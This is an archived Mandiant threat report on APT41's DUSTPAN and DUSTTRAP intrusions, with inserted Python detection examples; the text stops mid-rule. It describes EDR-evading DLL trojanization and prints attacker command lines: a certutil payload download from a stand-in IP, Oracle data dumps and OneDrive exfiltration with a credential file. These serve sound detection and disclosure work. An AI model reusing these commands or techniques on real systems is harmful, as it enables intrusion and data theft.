{
	"id": "be8b1480-a1e6-4b25-a9d2-e04b830f915b",
	"created_at": "2026-04-06T00:18:34.096232Z",
	"updated_at": "2026-04-10T03:32:21.242245Z",
	"deleted_at": null,
	"sha1_hash": "0c90777c8e5814d8e624e737c865f4dd4e45372d",
	"title": "APT41 Has Arisen From the DUST",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 489513,
	"plain_text": "APT41 Has Arisen From the DUST\r\nBy Mandiant\r\nPublished: 2024-07-18 · Archived: 2026-04-05 14:29:03 UTC\r\nWritten by: Mike Stokkel, Pierre Gerlings, Renato Fontana, Luis Rocha, Jared Wilson, Stephen Eckels, Jonathan\r\nLepore\r\nExecutive Summary\r\nIn collaboration with Google’s Threat Analysis Group (TAG), Mandiant has observed a sustained campaign\r\nby the advanced persistent threat group APT41 targeting and successfully compromising multiple\r\norganizations operating within the global shipping and logistics, media and entertainment, technology, and\r\nautomotive sectors. The majority of organizations were operating in Italy, Spain, Taiwan, Thailand, Turkey,\r\nand the United Kingdom.\r\nAPT41 successfully infiltrated and maintained prolonged, unauthorized access to numerous victims'\r\nnetworks since 2023, enabling them to extract sensitive data over an extended period. \r\nAPT41 used a combination of ANTSWORD and BLUEBEAM web shells for the execution of\r\nDUSTPAN to execute BEACON backdoor for command-and-control communication. Later in the\r\nintrusion, APT41 leveraged DUSTTRAP, which would lead to hands-on keyboard activity. APT41 used\r\npublicly available tools SQLULDR2 for copying data from databases and PINEGROVE to exfiltrate data\r\nto Microsoft OneDrive.\r\nOverview\r\nRecently, Mandiant became aware of an APT41 intrusion where the malicious actor deployed a combination of\r\nANTSWORD and BLUEBEAM web shells for persistence. These web shells were identified on a Tomcat Apache\r\nManager server and active since at least 2023. APT41 utilized these web shells to execute certutil.exe to download\r\nthe DUSTPAN dropper to stealthily load BEACON. \r\nAs the APT41 intrusion progressed, the group escalated its tactics by deploying the DUSTTRAP dropper. Upon\r\nexecution, DUSTTRAP would decrypt a malicious payload and execute it in memory, leaving minimal forensic\r\ntraces. 
The decrypted payload was designed to establish a communication channel either with APT41-controlled infrastructure for command and control or, in some instances, with a compromised Google Workspace account, further blending its malicious activity with legitimate traffic. The affected Google Workspace accounts have been remediated to prevent further unauthorized access.\r\nFurthermore, APT41 leveraged SQLULDR2 to export data from Oracle databases and used PINEGROVE to systematically and efficiently exfiltrate large volumes of sensitive data from the compromised networks, uploading it to OneDrive for later retrieval and analysis.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust\r\nPage 1 of 22\n\nFigure 1: Attack path diagram of observed APT41 attack\r\nVictimology\r\nIn collaboration with Google's TAG, Mandiant notified multiple additional organizations across various sectors that had been compromised by this campaign. The organizations impacted by this campaign originated from a diverse range of countries spanning multiple continents, including:\r\nItaly\r\nSpain\r\nTaiwan\r\nThailand\r\nTurkey\r\nUnited Kingdom\r\nAn analysis of victim organizations within specific sectors reveals a notable geographic distribution. Nearly all targeted organizations operating in the shipping and logistics sector were located in Europe and the Middle East, with a single exception. 
In contrast, all affected organizations within the media and entertainment sector were located in Asia.\r\nA significant portion of the victimized organizations within the shipping and logistics sector maintained operations across multiple continents, often as subsidiaries or affiliates of larger multinational corporations operating within the same industry.\r\nMandiant has detected reconnaissance activity directed towards similar organizations operating within other countries such as Singapore. At the time of publication, neither Mandiant nor Google TAG has any indication that these organizations have been compromised by APT41, but the activity could indicate an expanded scope of targeting.\r\nFigure 2: Sectors impacted by APT41’s DUSTTRAP campaigns in 2024\r\nAPT41\r\nAPT41 is a prolific cyber threat group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity that may be outside of state control. The group's financially motivated intrusions have primarily targeted the video game industry, involving activities such as stealing source code and digital certificates, manipulating virtual currencies, and attempting to deploy ransomware. APT41 is unique among tracked China-based actors in that it utilizes non-public malware typically reserved for espionage operations in activities that appear to fall outside the scope of state-sponsored missions.\r\nThe group's espionage operations have targeted sectors such as healthcare, high-tech, and telecommunications, and other areas of economic interest. APT41 has frequently used software supply chain compromises, in which it injects malicious code into legitimate software updates. 
The group also employs advanced techniques such as bootkits and compromised digital certificates. Its consistent targeting of the video game industry for personal gain is believed to have contributed to the development of tactics later used in its espionage operations.\r\nFor additional information on APT41, refer to the following links:\r\nDoes This Look Infected? A Summary of APT41 Targeting U.S. State Governments\r\nThreat Activity\r\nDUSTPAN and BEACON\r\nDUSTPAN is an in-memory dropper written in C/C++ that decrypts and executes an embedded payload. Different variations of DUSTPAN may also load an external payload off disk from a hard-coded file path encrypted in the Portable Executable (PE) file. DUSTPAN may be configured to inject the decrypted payload into another process or to create a new thread and execute it within its own process space.\r\nPreviously used by APT41 in several 2021 and 2022 breaches, DUSTPAN resurfaced in a recent investigation. This time, APT41 disguised DUSTPAN as a Windows binary by executing the malicious file under the name w3wp.exe or conn.exe. Additionally, the DUSTPAN samples were made persistent via Windows services; for example, one of the services was called \"Windows Defend\".\r\nThe DUSTPAN samples were configured to load ChaCha20-encrypted BEACON payloads into memory. Once executed, the BEACON payloads communicated either with self-managed infrastructure hosted behind Cloudflare or with Cloudflare Workers as their command-and-control (C2) channel. BEACON configuration can be found in the Indicators of Compromise section.\r\nDUSTTRAP\r\nDUSTTRAP is a multi-stage plugin framework with multiple components. DUSTTRAP begins with a launcher (Stage 1) that AES-128-CFB decrypts an encrypted on-disk PE file named \u003cvaries\u003e.dll.mui and executes it in memory. 
Decryption relies on the target machine's HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid value, thereby keying the launcher to the victim system. One consequence for analysts is that a collected .dll.mui file cannot be decrypted off the victim host unless that host's MachineGuid is recovered alongside it. The decrypted PE from the launcher is a memory-only dropper (Stage 2) that is responsible for decrypting an embedded configuration and two or more embedded plugin dynamic-link libraries (DLLs) from its .lrsrc section. Once executed, these DLLs begin the setup of the modular plugin system. The first observed plugin (Stage 3) is responsible for low-level network setup and encryption. The second observed plugin (Stage 4) is responsible for higher-level network operations and may function as a downloader for additional plugins that, when loaded, may register themselves with prior components in the execution chain for additional functionality. We've observed the second plugin to vary in functionality, and more plugin variants likely exist.\r\nPlugin loading is performed by trojanizing a legitimate system DLL from %windir% with a sufficiently large .text section to hold the contents of each plugin. To trojanize the target DLL, the dropper generates a new file on disk at %windir%\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Data.Trace\\v4.0_4.0.0.0__b0\u003chex_uuid\u003e\\\u003coriginal_module_name\u003e.dll or %programdata%\\Microsoft.NET\\System.Data.Trace\\v4.0_4.0.0.0__b0\u003chex_uuid\u003e\\\u003coriginal_module_name\u003e.dll. The malicious plugin code is only present in the .text section of this file long enough to call ZwCreateSection, which maps the trojanized plugin code into memory. Before the trojanized file is closed, the original contents of the .text section are restored on disk. This is an evasion technique that bypasses endpoint detection and response (EDR) solutions that scan file contents on file close. 
The malicious code may therefore not be present in the file, depending on when it was quarantined. During the trojanization process, the dropper may write the system time to a log file named \u003cfiletime\u003e.log and acquire the mutex ICMzUEkdLNayBdWF, though mutex names will likely vary from host to host.\r\nThe following legitimate DLLs are blocklisted from being trojanized:\r\ncfgmgr32.dll\r\ncombase.dll\r\ncryptbase.dll\r\ncryptsp.dll\r\ndhcpcsvc.dll\r\ndhcpcsvc6.dll\r\ndnsapi.dll\r\nFWPUCLNT.DLL\r\ngdi32.dll\r\ngdi32full.dll\r\niertutil.dll\r\nimm32.dll\r\nIPHLPAPI.DLL\r\nkernel.appcore.dll\r\nkernel32.dll\r\nKernelBase.dll\r\nlocale.nls\r\nmsvcp_win.dll\r\nmsvcrt.dll\r\nmswsock.dll\r\nNapiNSP.dll\r\nnlaapi.dll\r\nnsi.dll\r\nntdll.dll\r\nntmarta.dll\r\noleaut32.dll\r\nOnDemandConnRouteHelper.dll\r\npnrpnsp.dll\r\npowrprof.dll\r\nadvapi32.dll\r\napphelp.dll\r\nbcrypt.dll\r\nbcryptprimitives.dll\r\nprofapi.dll\r\nrasadhlp.dll\r\nrpcrt4.dll\r\nrsaenh.dll\r\nsechost.dll\r\nSHCore.dll\r\nshell32.dll\r\nshlwapi.dll\r\nsspicli.dll\r\nucrtbase.dll\r\nurlmon.dll\r\nuser32.dll\r\nuserenv.dll\r\nwebio.dll\r\nwin32u.dll\r\nwindows.storage.dll\r\nwinhttp.dll\r\nwininet.dll\r\nwinnlsres.dll\r\nwinnsi.dll\r\nwinrnr.dll\r\nwinsta.dll\r\nws2_32.dll\r\nwshbth.dll\r\nWtsapi32.dll\r\nThe section objects created by the Stage 2 dropper for each trojanized plugin are appended to a linked list in the dropper's process and executed in memory. The dropper and each plugin perform a registration process with each other so that Stages 2, 3, and 4 rely on each other and cooperatively call into and out of each other to handle the operation each is responsible for. Execution between all of these components is accomplished via a Windows fiber-based task event loop driven by Stage 2. 
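The Stage 2 dropper carries its configuration and plugin DLLs in a section named .lrsrc, and the M_HUNTING_DUSTTRAP_PayloadFile YARA rule at the end of this report keys on that section name plus the first three dwords of its contents. The following is an added example, not Mandiant's code: a stdlib-only Python port of that structural test for triaging files on hosts where YARA is not installed. The PE images it builds for its own test are constructed inputs, not DUSTTRAP samples, and because the rule only constrains the values of the three dwords, nothing here assumes what they mean.

```python
"""Structural triage for DUSTTRAP payload files (added example, not Mandiant code).

Ports the section-header test of the M_HUNTING_DUSTTRAP_PayloadFile YARA rule
to stdlib Python so it can run on hosts without YARA. build_test_pe() makes
constructed test inputs, not real samples; the rule only constrains the values
of the three leading dwords of .lrsrc, so their meaning is not assumed here.
"""
import struct
import sys
from pathlib import Path
from typing import Iterable, Iterator, List, Tuple

PE_SIGNATURE = b"PE\0\0"
# Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
# SizeOfOptionalHeader, Characteristics
COFF_HEADER_FMT = "<HHIIIHH"
# Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
# NumberOfLinenumbers, Characteristics
SECTION_HEADER_FMT = "<8sIIIIIIHHI"


def iter_sections(data: bytes) -> Iterator[Tuple[str, int, int]]:
    """Yield (name, PointerToRawData, SizeOfRawData) for every section header of a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        return
    _, n_sections, _, _, _, opt_size, _ = struct.unpack_from(COFF_HEADER_FMT, data, e_lfanew + 4)
    offset = e_lfanew + 24 + opt_size          # section table follows the optional header
    for _ in range(n_sections):
        if offset + 40 > len(data):
            return
        fields = struct.unpack_from(SECTION_HEADER_FMT, data, offset)
        name, raw_size, raw_off = fields[0], fields[3], fields[4]
        yield name.rstrip(b"\0").decode("ascii", "replace"), raw_off, raw_size
        offset += 40


def looks_like_dusttrap_payload(data: bytes) -> bool:
    """Same test as the YARA rule: a .lrsrc section whose first dword is 0x100,
    whose raw size exceeds that dword, and whose second and third dwords are
    small (< 0x1000 and < 4 respectively)."""
    for name, raw_off, raw_size in iter_sections(data):
        if name != ".lrsrc" or raw_off + 12 > len(data):
            continue
        d0, d1, d2 = struct.unpack_from("<III", data, raw_off)
        if d0 == 0x100 and raw_size > d0 and d1 < 0x1000 and d2 < 4:
            return True
    return False


def scan_paths(paths: Iterable[Path]) -> List[Path]:
    """Return every file under the given files/directories that passes the test."""
    hits = []
    for root in paths:
        candidates = root.rglob("*") if root.is_dir() else [root]
        for p in candidates:
            if p.is_file() and looks_like_dusttrap_payload(p.read_bytes()):
                hits.append(p)
    return hits


def lrsrc_header(d0: int, d1: int, d2: int) -> bytes:
    """First three dwords of a section body, for building test inputs."""
    return struct.pack("<III", d0, d1, d2)


def build_test_pe(section_name: bytes, body: bytes, raw_size: int = 0x200) -> bytes:
    """Assemble a minimal single-section PE32+ image (constructed test input, not a sample)."""
    e_lfanew, raw_off = 0x80, 0x200
    optional = b"\x0b\x02" + b"\0" * 238     # PE32+ magic, remaining optional header zeroed
    coff = struct.pack(COFF_HEADER_FMT, 0x8664, 1, 0, 0, 0, len(optional), 0x2022)
    section = struct.pack(SECTION_HEADER_FMT, section_name.ljust(8, b"\0"),
                          raw_size, 0x1000, raw_size, raw_off, 0, 0, 0, 0, 0x40000040)
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    headers = (dos + PE_SIGNATURE + coff + optional + section).ljust(raw_off, b"\0")
    return headers + body.ljust(raw_size, b"\0")[:raw_size]


if __name__ == "__main__":
    for hit in scan_paths(Path(arg) for arg in sys.argv[1:]):
        print(hit)
```

Run it as `python triage_lrsrc.py C:\Windows\Microsoft.NET` (or any directory) to list files whose .lrsrc section matches; the YARA rule is the authoritative form, and this port exists so the same check can be scripted into a collection workflow that cannot ship a YARA binary.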
Additional plugins may be registered and executed via this plugin framework.\r\nWe've observed at least 15 plugins with the higher-level themes of:\r\nShell Operations: execute processes via cmd.exe\r\nFile System Operations: directory enumeration, change directory, delete file, create directory, copy file, move file, file exists, change file timestamp, list attached drives\r\nProcess Operations: enumerate running processes, inject shellcode, kill a process\r\nNetwork Probing: ping a remote host, attempt connections on a port\r\nNetwork Store Interface Operations: get network interface statistics\r\nScreen Operations: get screen size, screenshot\r\nSystem Information Survey: list RDP sessions, list installed security software, get system info, list user accounts, get system boot time, enumerate hidden and visible process windows\r\nFile Manipulation Operations: open file, write file, CRC32 file content, read file, close file\r\nKeylogger: activate, delete log\r\nActive Directory Operations: enumerate domain controller information, add user, delete user, get server configuration, get server shares, get detailed server and workstation domain information, enumerate servers, get list of services, get list of network shares, add network share, disconnect network share, get list of users, set user password\r\nFile Uploader: upload a file resident on disk\r\nRDP: enumerate remote desktop sessions\r\nDNS Operations: perform DNS lookups\r\nDNS Cache Operations: retrieve the DNS cache table\r\nRegistry Operations: get registry value, dump registry path and children to disk, set registry value, delete registry value\r\nFigure 3: Full execution flow of 
DUSTTRAP\r\nSQLULDR2\r\nSQLULDR2 is a command-line utility written in C/C++ that can be used to export the contents of a remote Oracle database to a local text-based file. Multiple command-line parameters are available to specify the details of the export, including but not limited to query, user, rows, and text.\r\nAPT41 exported data from Oracle databases to CSV format with the following command:\r\nC:\\ProgramData\\luldr\\luldr\\sqluldr.exe user=\u003cUSER\u003e@\u003cSYSTEM\u003e:1521/\u003cDATABASE\u003e charset=utf8 safe=yes head=yes text=csv rows=50000000 batch=yes query=\u003cSQL QUERY\u003e file=\u003cOUTPUT\u003e.csv\r\nFigure 4: Command line execution for SQLULDR2\r\nPINEGROVE\r\nDuring the intrusion, Mandiant observed APT41 leveraging PINEGROVE for data exfiltration. PINEGROVE is a command-line uploader written in Go with functionality to collect and upload a file to OneDrive via the OneDrive API. PINEGROVE expects an authentication JSON file containing the relevant OneDrive credentials and the target file to upload.\r\nC:\\Programdata\\One.exe -c C:\\ProgramData\\auth.json -s \u003cFilename\u003e\r\nFigure 5: Command line execution for PINEGROVE\r\nPINEGROVE is a publicly available tool and has been made available on GitHub.\r\nCode Signing Certificates\r\nThe DUSTTRAP malware and its associated components that were observed during the intrusion were code signed with presumably stolen code signing certificates. 
One of the code signing certificates appeared to belong to a South Korean company operating in the gaming industry.\r\nSerial Number:\r\n    6f:97:f1:3d:a5:5e:9f:70:a6:92:7e:d1:b3:3e:ee:ee\r\nSignature Algorithm: sha256WithRSAEncryption\r\nIssuer: C = US, O = \"thawte, Inc.\", CN = thawte SHA256 Code Signing CA\r\nValidity\r\n    Not Before: Feb 21 00:00:00 2019 GMT\r\n    Not After : Apr 21 23:59:59 2022 GMT\r\nSubject: C = KR, ST = SEOUL, L = Gangnam-gu, O = CCR INC, OU = IT Team, CN = CCR INC\r\nFigure 6: Code signing certificate abused by APT41\r\nSerial Number:\r\n    05:fa:8a:72:da:46:07:4f:de:1e:34:c7:46:61:ee:00\r\nSignature Algorithm: sha256WithRSAEncryption\r\nIssuer: C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert SHA2 Assured ID Code Signing CA\r\nValidity\r\n    Not Before: Jul 15 00:00:00 2020 GMT\r\n    Not After : Aug 31 12:00:00 2022 GMT\r\nSubject: C = RU, L = Moscow, O = OOO ALEAN-TOUR, CN = OOO ALEAN-TOUR\r\nFigure 7: Code signing certificate abused by APT41\r\nAdditionally, Mandiant observed a further DUSTTRAP sample on VirusTotal that was code signed with a certificate from another South Korean gaming company. This same certificate was previously observed by Mandiant in 2020 being used by UNC3914, which is suspected to be another Chinese-nexus threat actor. 
Note that neither Mandiant nor TAG sees any direct relation between UNC3914 and APT41 at the time of writing.\r\nSerial Number:\r\n    0a:2c:bf:9b:18:fe:1b:20:b9:4e:ca:c4:b0:78:b8:c1\r\nSignature Algorithm: sha256WithRSAEncryption\r\nIssuer: C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert SHA2 Assured ID Code Signing CA\r\nValidity\r\n    Not Before: Nov 12 00:00:00 2020 GMT\r\n    Not After : Jan 17 23:59:59 2023 GMT\r\nSubject: C = KR, ST = Seoul, L = Gangnam-gu, O = Gala Lab Corp., CN = Gala Lab Corp.\r\nFigure 8: Code signing certificate abused by APT41\r\nThe use of stolen code signing certificates, and the fact that their suspected owners are companies in the gaming sector, aligns with APT41's tactics, techniques, and procedures (TTPs) and past campaigns. More details can be found in our APT41 report. Note that the validity windows of all three certificates had closed by January 2023; a signature made with one of them chains correctly only if it carries a trusted timestamp from inside that window, which is why the hunting rules below match on certificate serial number and subject rather than on signature validity.\r\nAcknowledgement\r\nWe would like to thank Google’s TAG, our Incident Response consultants, and FLARE, who enabled this research. Additionally, we want to thank Mnemonic for reaching out to Mandiant to share their observations.\r\nMITRE ATT\u0026CK\r\nTactic | ID | Name | Description\r\nReconnaissance | T1593.002 | Search Open Websites/Domains: Search Engines | APT41 was observed using search engines to locate and visit victims' internet-reachable servers.\r\nReconnaissance | T1594 | Search Victim-Owned Websites | APT41 was observed visiting externally reachable victim-owned infrastructure that appeared in internet scan data.\r\nCollection | T1560.001 | Archive via Utility | APT41 was observed using rar to compress the data it downloaded from internal Oracle databases.\r\nCommand and Control | T1071.001 | Web Protocols | APT41's malware was observed using HTTPS for C2 communication.\r\nExfiltration | T1567.002 | Exfiltration to Cloud Storage | APT41 was observed using OneDrive for the exfiltration of staged data.\r\nPersistence | T1543.003 | Create or Modify System Process: Windows Service | APT41 was observed creating a Windows service to achieve persistence.\r\nPersistence | T1574.001 | DLL Search Order Hijacking | APT41 abused DLL search order hijacking to execute DUSTTRAP, using benign and malicious code-signed Windows binaries.\r\nPersistence | T1574.002 | DLL Side-Loading | APT41 abused DLL side-loading to execute DUSTTRAP via the AhnLab uninstaller.\r\nDefense Evasion | T1070.004 | File Deletion | APT41 deleted files from the system once it was done with them; this was observed after APT41 created database dumps and exfiltrated the files.\r\nDefense Evasion | T1036.005 | Match Legitimate Name or Location | APT41 used legitimate Windows names and locations for trojanized binaries.\r\nDefense Evasion | T1027.013 | Encrypted/Encoded File | APT41 used AES-128-CFB to encrypt the payloads loaded by DUSTTRAP.\r\nPersistence | T1505.003 | Server Software Component: Web Shell | APT41 was observed using web shells to drop and execute DUSTPAN.\r\nExecution | T1569.002 | Service Execution | APT41 was observed using Windows services to execute DUSTPAN binaries.\r\nIndicators of Compromise\r\nA GTI Collection is available for all the samples that are publicly available. 
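The command lines in Figures 4 and 5, the certutil.exe download from the web shell, the rar archiving of database dumps in the ATT&CK table, DUSTPAN running under the name w3wp.exe, and the DUSTTRAP staging path can all be expressed as process- and file-event detections. The following is an added example, not Mandiant's code and not the YARA-L rules listed at the end of this report: a stdlib Python rule set evaluated over constructed events. The hostnames, paths and the 192.0.2.10 address are made up, and the certutil -urlcache flags are an assumption, since the report only states that certutil.exe was used for the download.

```python
"""Event detections for the tooling described in this report (added example).

Stdlib-only sketch, not Mandiant's YARA-L rules. Events are dicts with "host",
"image" and optionally "cmdline" / "target_file"; SAMPLE_EVENTS is constructed
for the test (hosts, paths and 192.0.2.10 are made up).
"""
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Each rule runs over "<image>\t<cmdline>\t<target_file>" so it can key on any field.
RULES = {
    # Figure 4: sqluldr pulling an Oracle database over port 1521 into CSV.
    "SQLULDR2 Process Launch": re.compile(
        r"sqluldr2?\.exe\b.*\buser=\S+@\S+:1521/\S+.*\btext=csv\b", re.I),
    # Figure 5: PINEGROVE given a credential JSON (-c) and a file to upload (-s).
    "PINEGROVE OneDrive Upload": re.compile(
        r"\\(one|onedriveuploader)\.exe\s+-c\s+\S+\.json\s+-s\s+\S+", re.I),
    # Overview: certutil.exe fetching the DUSTPAN dropper (the -urlcache flags are an assumption).
    "certutil Remote Download": re.compile(
        r"certutil(\.exe)?\s+.*-urlcache\b.*\bhttps?://", re.I),
    # T1560.001: rar adding a CSV dump to an archive before exfiltration.
    "WinRAR Command Line CSV to RAR": re.compile(
        r"\brar(\.exe)?\s+a\b.*\.rar\b.*\.csv\b", re.I),
    # DUSTTRAP's staging directory for trojanized system DLLs (both variants from the report).
    "DUSTTRAP Plugin Staging Path": re.compile(
        r"\\Microsoft\.NET\\(assembly\\GAC_MSIL\\)?System\.Data\.Trace\\"
        r"v4\.0_4\.0\.0\.0__b0[0-9a-f]+\\[^\\\s]+\.dll", re.I),
    # DUSTPAN masquerading as w3wp.exe: the real IIS worker lives under \inetsrv\.
    "w3wp.exe Outside inetsrv": re.compile(
        r"^(?![^\t]*\\inetsrv\\)[^\t]*\\w3wp\.exe\t", re.I),
}


def evaluate(event: Event) -> List[str]:
    """Names of every rule the event matches, in RULES order ([] if none)."""
    subject = "\t".join(event.get(k, "") for k in ("image", "cmdline", "target_file"))
    return [name for name, rx in RULES.items() if rx.search(subject)]


def detect(events: List[Event]) -> List[Tuple[str, str]]:
    """(host, rule name) pairs for every match across a batch of events."""
    return [(e["host"], name) for e in events for name in evaluate(e)]


SAMPLE_EVENTS: List[Event] = [  # constructed for this example, not telemetry from a real host
    {"host": "db01", "image": r"C:\ProgramData\luldr\luldr\sqluldr.exe",
     "cmdline": r'C:\ProgramData\luldr\luldr\sqluldr.exe user=app@db01:1521/ORCL charset=utf8 '
                r'safe=yes head=yes text=csv rows=50000000 batch=yes query="select * from customers" file=customers.csv'},
    {"host": "db01", "image": r"C:\ProgramData\One.exe",
     "cmdline": r"C:\ProgramData\One.exe -c C:\ProgramData\auth.json -s C:\ProgramData\customers.rar"},
    {"host": "web01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://192.0.2.10/conn.exe C:\ProgramData\conn.exe"},
    {"host": "web01", "image": r"C:\ProgramData\w3wp.exe", "cmdline": r"C:\ProgramData\w3wp.exe"},
    {"host": "web01", "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": r"c:\windows\system32\inetsrv\w3wp.exe -ap DefaultAppPool"},
    {"host": "db01", "image": r"C:\Program Files\WinRAR\rar.exe",
     "cmdline": r"rar.exe a -r C:\ProgramData\customers.rar C:\ProgramData\customers.csv"},
    {"host": "web01", "image": r"C:\Users\Public\update.exe",
     "target_file": r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Trace\v4.0_4.0.0.0__b0a1b2c3d4\dbgeng.dll"},
    {"host": "fs01", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
]


if __name__ == "__main__":
    for host, rule in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

The legitimate IIS worker (event 5) and the svchost.exe event produce no hits, which is the property to preserve when porting these patterns to a SIEM: the w3wp.exe rule keys on the image path, not the name, and the rar rule requires both a .rar target and a .csv input on the same command line.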
\r\nHost-Based Indicators\r\nFilename | MD5 | Family\r\nsqluldr.exe | fcff642268898fcf65702a214aefbf9e | SQLULDR2\r\nOneDriveUploader.exe | ac125aea0b703de37980779599438b4a | PINEGROVE\r\naclui.dll | 17d0ada8f5610ff29f2e8eaf0e3bb578 | DUSTPAN\r\ndbgeng.dll | 9991ce9d2746313f505dbf0487337082 | DUSTTRAP\r\ndbgeng.dll | c33247bc3e7e8cb72133e47930e6ddad | DUSTTRAP\r\nhostfxr.dll | cfce85548436fb89a83bf34dc17f325d | DUSTTRAP\r\ndbgeng.dll | e98b9e21928252332edf934f3d18ac21 | DUSTTRAP\r\ndbgeng.dll | 8222352a61eacca3a1c6517956aa0b55 | DUSTTRAP\r\n- | dc725f5e9b1ae062fbec86ee4d816b45 | DUSTTRAP\r\nSbiedll.dll | d72f202c1d684c9a19f075290a60920f | DUSTTRAP\r\natstrust.dll | 393065ef9754e3f39b24b2d1051eab61 | DUSTTRAP\r\n- | 0e74285f3359393e57f5d49c156aca47 | DUSTTRAP\r\nconn.exe | 35f650c94faf6a2068e8238dd99edbea | DUSTPAN\r\nPrintWorkflowUserSvc_a0c15f9d.dll / cbi.dll | 3bb44c0dd7f424864d76d4df09538cb6 | DUSTPAN\r\ndbgeng.dll | aca5c6daecf463012a09564764584937 | DUSTTRAP\r\n- | 336a0d6f8cc92bf9740ce17de600463b | DUSTTRAP\r\n- | 6bc4a92ff4d2cfc9da91ae6a5d2ad3d5 | DUSTTRAP\r\n- | a689e182fe33b9d564dddc35412ea0a7 | DUSTTRAP\r\n- | e4a4aafb49b8c86a5ac087ae342c0ee6 | DUSTTRAP\r\n- | e584119a4766e6cf49093c666965c8be | DUSTTRAP\r\n- | f1769ad5a9dc44794895275c656ed484 | DUSTTRAP\r\nNetwork-Based Indicators\r\nValue | Family | Comment\r\nns2[.]akacur[.]tk | BEACON | -\r\nns1[.]akacur[.]tk | BEACON | -\r\norange-breeze-66bb[.]tezsfsoikdvd[.]workers[.]dev | BEACON | -\r\nwww[.]eloples[.]com | DUSTTRAP | First observed 2024-02-21, last observed 2024-07-16\r\n95.164.16[.]231 | - | Related to DUSTTRAP FQDN www[.]eloples[.]com\r\n152.89.244[.]185 | - | Used to deliver DUSTPAN; first activity observed 2023-03-21\r\nhxxp://152.89.244[.]185/conn.exe | - | Used to deliver DUSTPAN; first activity observed 2023-03-21\r\nYARA and YARA-L 
Rules\r\nYARA\r\nrule M_Hunting_Certificate_Gala_lab_corp\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Rule looks for PEs signed using likely stolen certificate issued for Gala Lab corp\"\r\n        disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n    strings:\r\n        $org = \"Gala Lab Corp.\"\r\n        $serial = { 0A 2C BF 9B 18 FE 1B 20 B9 4E CA C4 B0 78 B8 C1 }\r\n    condition:\r\n        ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0xE011CFD0 and uint32(4) == 0xE11AB1A1)) and #org \u003e 1 and $serial\r\n}\r\nrule M_Hunting_Certificate_CCR_INC\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Rule looks for PEs signed using likely stolen certificate issued for CCR INC\"\r\n        disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n    strings:\r\n        $org = \"CCR INC\"\r\n        $serial = { 6F 97 F1 3D A5 5E 9F 70 A6 92 7E D1 B3 3E EE EE }\r\n    condition:\r\n        ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0xE011CFD0 and uint32(4) == 0xE11AB1A1)) and #org \u003e 1 and $serial\r\n}\r\nrule M_Hunting_Certificate_ALEAN_TOUR\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Rule looks for PEs signed using likely stolen certificate issued for ALEAN-TOUR\"\r\n        disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n    strings:\r\n        $org = \"OOO ALEAN-TOUR\"\r\n        $serial = { 05 FA 8A 72 DA 46 07 4F DE 1E 34 C7 46 61 EE 00 }\r\n    condition:\r\n        ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) or (uint32(0) == 0xE011CFD0 and uint32(4) == 0xE11AB1A1)) and #org \u003e 1 and $serial\r\n}\r\nrule M_Hunting_Uploader_PINEGROVE_1\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Hunting for PINEGROVE uploader malware family.\"\r\n        disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n    strings:\r\n        $s1 = \"Config: `%v`\" ascii\r\n        $s2 = \"auth.json\" ascii\r\n        $s3 = \"sp=%v%v%x\" ascii\r\n        $s4 = \"Time: %v\" ascii\r\n        $s5 = \"/me/drive/root\" ascii\r\n        $s6 = \"OneDrive\" ascii fullword\r\n        $s7 = \"microsoft.graph.driveItemUploadableProperties\" ascii\r\n        $s8 = \"client_id=%v\u0026client_secret=%v\" ascii\r\n        $s9 = \"http://localhost/onedrive-login\" ascii\r\n    condition:\r\n        (\r\n            ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) or (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0) == 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or\r\n            (uint32(0) == 0x464c457f) or\r\n            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550)\r\n        ) and\r\n        (6 of them)\r\n}\r\nrule M_Hunting_Uploader_PINEGROVE_2\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Hunting for PINEGROVE uploader malware family.\"\r\n        disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n    strings:\r\n        $f1 = \"main.AllFiles\" ascii\r\n        $f2 = \"main.Collect\" ascii\r\n        $f3 = 